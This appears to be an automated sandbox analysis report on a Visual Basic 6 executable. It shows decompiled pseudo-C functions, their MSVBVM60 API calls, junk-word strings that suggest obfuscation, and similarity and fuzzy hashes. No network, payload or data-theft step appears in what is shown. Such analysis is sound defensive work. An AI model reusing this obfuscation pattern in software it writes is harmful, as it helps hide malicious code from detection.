      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
      • String ID: Gurgledes$ICHTHYOPOLISM
      • API String ID: 2536202667-1995639141
      • Opcode ID: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
      • Instruction ID: 77930b54b084aa1f6d5c2f66190b20487ba8b70db1681777619c98ad140c7449
      • Opcode Fuzzy Hash: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
      • Instruction Fuzzy Hash: 07910571D00218EFDB10EFA5C985BDDBBB5BF09308F20816AE405B72A2DB785A45CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F11E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON
      Download Yara Rule
      C-Code - Quality: 49%
      			E0041F11E(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				signed int* _v136;
				char _v144;
				signed int _v148;
				short _v152;
				signed int _v164;
				signed int* _t54;
				signed int _t56;
				short _t58;
				char* _t61;
				char* _t67;
				void* _t95;
				intOrPtr _t96;

				_t96 = _t95 - 0xc;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				L00401540();
				_v16 = _t96;
				_v12 = 0x401380;
				L004017B6();
				L004017B6();
				_t54 = _a24;
				 *_t54 =  *_t54 & 0x00000000;
				_push(L"Dukkestuer");
				L00401762();
				_v136 = _t54;
				_v144 = 0x8003;
				_v72 =  *0x401378;
				_v80 = 4;
				_push( &_v96);
				_t56 =  &_v80;
				_push(_t56);
				L004017A4();
				_v148 = _t56;
				if(_v148 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(_v148);
					L0040179E();
					_v164 = _t56;
				}
				_push( &_v144);
				_t58 =  &_v96;
				_push(_t58);
				L004016AE();
				_v152 = _t58;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t61 = _v152;
				if(_t61 != 0) {
					_push( &_v80);
					L00401654();
					L0040174A();
					_v88 = 5;
					_v96 = 2;
					_v120 = L"LAAGETS";
					_v128 = 8;
					L0040184C();
					_push( &_v96);
					_push(5);
					_push( &_v80);
					_push( &_v112);
					L0040168A();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push( &_v112);
					_t67 =  &_v60;
					_push(_t67);
					L00401858();
					_push(_t67);
					_push(L"SNVRET");
					_push(L"OVERBEBYRDES");
					L004016D8();
					L0040183A();
					_push(_t67);
					L004017B0();
					L0040183A();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004017D4();
					_push( &_v112);
					_push( &_v96);
					_t61 =  &_v80;
					_push(_t61);
					_push(3);
					L00401840();
				}
				L004017B6();
				asm("wait");
				_push(0x41f326);
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t61;
			}































      0x0041f121
      0x0041f124
      0x0041f12f
      0x0041f130
      0x0041f13c
      0x0041f144
      0x0041f147
      0x0041f154
      0x0041f15f
      0x0041f164
      0x0041f167
      0x0041f16a
      0x0041f16f
      0x0041f174
      0x0041f17a
      0x0041f18a
      0x0041f18d
      0x0041f197
      0x0041f198
      0x0041f19b
      0x0041f19c
      0x0041f1a1
      0x0041f1ae
      0x0041f1c3
      0x0041f1b0
      0x0041f1b0
      0x0041f1b6
      0x0041f1bb
      0x0041f1bb
      0x0041f1d0
      0x0041f1d1
      0x0041f1d4
      0x0041f1d5
      0x0041f1da
      0x0041f1e4
      0x0041f1e8
      0x0041f1e9
      0x0041f1eb
      0x0041f1f3
      0x0041f1fc
      0x0041f205
      0x0041f206
      0x0041f211
      0x0041f216
      0x0041f21d
      0x0041f224
      0x0041f22b
      0x0041f238
      0x0041f240
      0x0041f241
      0x0041f246
      0x0041f24a
      0x0041f24b
      0x0041f250
      0x0041f252
      0x0041f254
      0x0041f259
      0x0041f25a
      0x0041f25d
      0x0041f25e
      0x0041f263
      0x0041f264
      0x0041f269
      0x0041f26e
      0x0041f278
      0x0041f27d
      0x0041f27e
      0x0041f288
      0x0041f290
      0x0041f294
      0x0041f295
      0x0041f297
      0x0041f2a2
      0x0041f2a6
      0x0041f2a7
      0x0041f2aa
      0x0041f2ab
      0x0041f2ad
      0x0041f2b2
      0x0041f2bd
      0x0041f2c2
      0x0041f2c3
      0x0041f308
      0x0041f310
      0x0041f318
      0x0041f320
      0x0041f325

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F13C
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F154
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F15F
      • __vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F16F
      • #564.MSVBVM60(00000004,?), ref: 0041F19C
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F1B6
      • __vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F1D5
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F1EB
      • #546.MSVBVM60(?,?,?,00401546), ref: 0041F206
      • __vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F211
      • __vbaVarDup.MSVBVM60 ref: 0041F238
      • #629.MSVBVM60(?,?,00000005,00000002), ref: 0041F24B
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F25E
      • #712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F26E
      • __vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F278
      • #527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F27E
      • __vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F288
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F297
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F2AD
      • __vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F2BD
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F308
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F310
      • __vbaFreeVar.MSVBVM60(0041F326,?,?,00401546), ref: 0041F318
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F320
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
      • String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
      • API String ID: 3927249403-1920341584
      • Opcode ID: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
      • Instruction ID: f2d15253067c6071e3169fb37671c2c9716ff9cab3d009f5c391d9107434bfc0
      • Opcode Fuzzy Hash: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
      • Instruction Fuzzy Hash: 11510A72D0020DABDB10EBE1C846FDEB778AF04708F50817BB515B71E1EB785A498B99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E7A9, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 49%
      			E0041E7A9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				signed int* _t37;
				char* _t40;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401540();
				_v16 = _t67;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
				_t37 = _a16;
				 *_t37 =  *_t37 & 0x00000000;
				_push(0xb5);
				_push(L"SKADESLSHOLDELSERNE");
				_push(L"Fritgaaende");
				_push(0);
				L00401690();
				if(_t37 == 0xa2) {
					_v60 = 0xfe;
					_v68 = 2;
					_v92 = L"Flskekdet";
					_v100 = 8;
					L0040184C();
					_push( &_v68);
					_push(0x48);
					_push( &_v52);
					_push( &_v84);
					L0040168A();
					_push( &_v84);
					L00401834();
					L0040183A();
					_push( &_v84);
					_push( &_v68);
					_push( &_v52);
					_push(3);
					L00401840();
					_push(0x4f);
					_push(0x9e);
					_push(0x14);
					_push( &_v52);
					L00401684();
					_t37 =  &_v52;
					_push(_t37);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"GILENO");
				L004017EC();
				_push(_t37);
				_push( &_v52);
				L0040167E();
				_t40 =  &_v52;
				_push(_t40);
				L00401834();
				L0040183A();
				L00401828();
				_push(0x41e913);
				L00401846();
				L00401846();
				return _t40;
			}




















      0x0041e7ac
      0x0041e7bb
      0x0041e7c5
      0x0041e7cd
      0x0041e7d0
      0x0041e7d7
      0x0041e7e6
      0x0041e7e9
      0x0041e7ec
      0x0041e7ef
      0x0041e7f4
      0x0041e7f9
      0x0041e7fe
      0x0041e800
      0x0041e80a
      0x0041e810
      0x0041e817
      0x0041e81e
      0x0041e825
      0x0041e832
      0x0041e83a
      0x0041e83b
      0x0041e840
      0x0041e844
      0x0041e845
      0x0041e84d
      0x0041e84e
      0x0041e858
      0x0041e860
      0x0041e864
      0x0041e868
      0x0041e869
      0x0041e86b
      0x0041e873
      0x0041e875
      0x0041e87a
      0x0041e87f
      0x0041e880
      0x0041e885
      0x0041e888
      0x0041e889
      0x0041e893
      0x0041e89b
      0x0041e89b
      0x0041e8a0
      0x0041e8a5
      0x0041e8ad
      0x0041e8b1
      0x0041e8b2
      0x0041e8b7
      0x0041e8ba
      0x0041e8bb
      0x0041e8c5
      0x0041e8cd
      0x0041e8d2
      0x0041e905
      0x0041e90d
      0x0041e912

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E7C5
      • __vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E800
      • __vbaVarDup.MSVBVM60 ref: 0041E832
      • #629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041E845
      • __vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E84E
      • __vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E858
      • __vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041E86B
      • #539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E880
      • __vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E889
      • __vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E893
      • __vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E89B
      • #696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8A5
      • #698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8B2
      • __vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8BB
      • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8C5
      • __vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8CD
      • __vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E905
      • __vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E90D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Move$Free$#539#629#696#698ChkstkList
      • String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
      • API String ID: 1195518721-3815085929
      • Opcode ID: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
      • Instruction ID: 777f9abc72e3724b6f8c0b7e3feb8a44b471e464ddebcb32a68dee43277907db
      • Opcode Fuzzy Hash: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
      • Instruction Fuzzy Hash: 7531E972950258ABDB00FBD1DD86FEE77B8AF04704F54442AB501BB1E1DB789A098B58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420767, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON
      Download Yara Rule
      C-Code - Quality: 28%
      			E00420767(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				char* _t91;
				short _t93;
				short _t100;
				signed int _t106;
				signed int _t110;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t125 = _t124 - 0x18;
				 *[fs:0x0] = _t125;
				L00401540();
				_v28 = _t125;
				_v24 = 0x401470;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
				_v8 = 1;
				_v8 = 2;
				if(0 != 0) {
					_v8 = 3;
					L004017AA();
					_v52 = __fp0;
					_v8 = 4;
					if( *0x4223c0 != 0) {
						_v256 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v256 = 0x4223c0;
					}
					_v220 =  *_v256;
					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
					asm("fclex");
					_v224 = _t106;
					if(_v224 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402590);
						_push(_v220);
						_push(_v224);
						L004017C8();
						_v260 = _t106;
					}
					_v228 = _v56;
					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
					asm("fclex");
					_v232 = _t110;
					if(_v232 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x402ecc);
						_push(_v228);
						_push(_v232);
						L004017C8();
						_v264 = _t110;
					}
					L004017C2();
				}
				_v8 = 6;
				_v64 = 0x637f55;
				_v72 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L0040161E();
				L0040183A();
				L00401828();
				_v8 = 7;
				_v64 = 0x1f1c50;
				_v72 = 3;
				_push( &_v72);
				_push( &_v88);
				L00401678();
				_v96 = 0xc1;
				_v104 = 2;
				_push( &_v104);
				_push(0xe7);
				_push( &_v88);
				_push( &_v120);
				L004015F4();
				_v128 = 0x1a6490;
				_v136 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t91 =  &_v136;
				_push(_t91);
				L004015EE();
				_v144 = _t91;
				_v152 = 0x8008;
				_push( &_v120);
				_t93 =  &_v152;
				_push(_t93);
				L00401660();
				_v220 = _t93;
				_push( &_v152);
				_push( &_v120);
				_push( &_v136);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(6);
				L00401840();
				_t100 = _v220;
				if(_t100 != 0) {
					_v8 = 8;
					_push(0xffffffff);
					L004016E4();
					_v8 = 9;
					_push(L"Cryptodeist");
					L004017B0();
					L0040183A();
				}
				_v8 = 0xb;
				_v40 = 0x85ca67;
				asm("wait");
				_push(0x420a46);
				L00401846();
				L00401846();
				return _t100;
			}






































      0x0042076a
      0x00420779
      0x00420785
      0x0042078d
      0x00420790
      0x00420797
      0x0042079e
      0x004207ad
      0x004207b0
      0x004207b7
      0x004207c2
      0x004207c8
      0x004207cf
      0x004207d4
      0x004207d7
      0x004207e5
      0x00420802
      0x004207e7
      0x004207e7
      0x004207ec
      0x004207f1
      0x004207f6
      0x004207f6
      0x00420814
      0x0042082c
      0x0042082f
      0x00420831
      0x0042083e
      0x00420860
      0x00420840
      0x00420840
      0x00420842
      0x00420847
      0x0042084d
      0x00420853
      0x00420858
      0x00420858
      0x0042086a
      0x0042087e
      0x00420881
      0x00420883
      0x00420890
      0x004208b2
      0x00420892
      0x00420892
      0x00420894
      0x00420899
      0x0042089f
      0x004208a5
      0x004208aa
      0x004208aa
      0x004208bc
      0x004208bc
      0x004208c1
      0x004208c8
      0x004208cf
      0x004208d6
      0x004208d8
      0x004208da
      0x004208dc
      0x004208e1
      0x004208e2
      0x004208ec
      0x004208f4
      0x004208f9
      0x00420900
      0x00420907
      0x00420911
      0x00420915
      0x00420916
      0x0042091b
      0x00420922
      0x0042092c
      0x0042092d
      0x00420935
      0x00420939
      0x0042093a
      0x0042093f
      0x00420946
      0x00420950
      0x00420952
      0x00420954
      0x00420956
      0x00420958
      0x0042095e
      0x0042095f
      0x00420964
      0x0042096a
      0x00420977
      0x00420978
      0x0042097e
      0x0042097f
      0x00420984
      0x00420991
      0x00420995
      0x0042099c
      0x004209a0
      0x004209a4
      0x004209a8
      0x004209a9
      0x004209ab
      0x004209b3
      0x004209bc
      0x004209be
      0x004209c5
      0x004209c7
      0x004209cc
      0x004209d3
      0x004209d8
      0x004209e2
      0x004209e2
      0x004209e7
      0x004209ee
      0x004209f5
      0x004209f6
      0x00420a38
      0x00420a40
      0x00420a45

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420785
      • #535.MSVBVM60(?,?,?,?,00401546), ref: 004207CF
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 004207F1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 00420853
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208A5
      • __vbaFreeObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208BC
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208E2
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208EC
      • __vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208F4
      • #613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420916
      • #632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042093A
      • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 0042095F
      • __vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 0042097F
      • __vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004209AB
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004209C7
      • #527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209D8
      • __vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209E2
      • __vbaFreeStr.MSVBVM60(00420A46), ref: 00420A38
      • __vbaFreeStr.MSVBVM60(00420A46), ref: 00420A40
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
      • String ID: Cryptodeist
      • API String ID: 3497234973-3010629389
      • Opcode ID: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
      • Instruction ID: 32f9ce972ed43ce6ced16437ebc1781c13ca8861e626d3360c0f3d99aa6f1090
      • Opcode Fuzzy Hash: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
      • Instruction Fuzzy Hash: 8A712971900218EBDB10EF95CE45BDEB7B8AF04314F6086AAE115B71E1DB785B48CF64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420119, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 56%
      			E00420119(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t39;
				signed int _t43;
				signed int _t49;
				intOrPtr _t66;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t39 = 0x30;
				L00401540();
				_v12 = _t66;
				_v8 = 0x4013e0;
				L00401612();
				L0040183A();
				_push(_t39);
				_push(L"Skimmia");
				L0040172C();
				asm("sbb eax, eax");
				_v40 =  ~( ~_t39 + 1);
				L00401846();
				_t43 = _v40;
				if(_t43 != 0) {
					_push(0x47);
					L00401786();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v60 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v60 = 0x4223c0;
					}
					_v40 =  *_v60;
					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t49;
					if(_v44 >= 0) {
						_v64 = _v64 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v40);
						_push(_v44);
						L004017C8();
						_v64 = _t49;
					}
					_v48 = _v36;
					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
					asm("fclex");
					_v52 = _t43;
					if(_v52 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x4025b0);
						_push(_v48);
						_push(_v52);
						L004017C8();
						_v68 = _t43;
					}
					L004017C2();
				}
				_v24 = 0x5a4c00;
				_push(0x420269);
				L00401846();
				return _t43;
			}




















      0x0042011e
      0x00420129
      0x0042012a
      0x00420133
      0x00420134
      0x0042013c
      0x0042013f
      0x00420146
      0x00420150
      0x00420155
      0x00420156
      0x0042015b
      0x00420162
      0x00420167
      0x0042016e
      0x00420173
      0x00420179
      0x0042017f
      0x00420181
      0x0042018b
      0x00420197
      0x004201b1
      0x00420199
      0x00420199
      0x0042019e
      0x004201a3
      0x004201a8
      0x004201a8
      0x004201bd
      0x004201cc
      0x004201cf
      0x004201d1
      0x004201d8
      0x004201f1
      0x004201da
      0x004201da
      0x004201dc
      0x004201e1
      0x004201e4
      0x004201e7
      0x004201ec
      0x004201ec
      0x004201f8
      0x0042020a
      0x00420210
      0x00420212
      0x00420219
      0x00420235
      0x0042021b
      0x0042021b
      0x00420220
      0x00420225
      0x00420228
      0x0042022b
      0x00420230
      0x00420230
      0x0042023c
      0x0042023c
      0x00420241
      0x00420248
      0x00420263
      0x00420268

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420134
      • #669.MSVBVM60(?,?,?,?,00401546), ref: 00420146
      • __vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420150
      • __vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042015B
      • __vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042016E
      • #537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420181
      • __vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042018B
      • __vbaNew2.MSVBVM60(004025A0,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201A3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201E7
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042022B
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042023C
      • __vbaFreeStr.MSVBVM60(00420269,Skimmia,00000000,?,?,?,?,00401546), ref: 00420263
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
      • String ID: Printermanualen$Skimmia
      • API String ID: 2004920347-2169568590
      • Opcode ID: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
      • Instruction ID: 02f006f38bdf809f65cd51ea96890a5b1fd2d4245cefb2ebfb6a0586a8c405c6
      • Opcode Fuzzy Hash: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
      • Instruction Fuzzy Hash: 1C311871A50218EFCB00EFA5D986BEDBBF4BF08704F60406AF501B61E1DBB95900CB29
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041EBDC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON
      Download Yara Rule
      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EBF8
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EC22
      • __vbaVarDup.MSVBVM60 ref: 0041EC49
      • #607.MSVBVM60(?,000000BB,?), ref: 0041EC5B
      • __vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC64
      • __vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC6E
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041EC7D
      • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041EC9E
      • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECA7
      • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB1
      • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB9
      • __vbaFreeStr.MSVBVM60(0041ECFC,?,?,?,?,00401546), ref: 0041ECDB
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECE6
      • __vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECEE
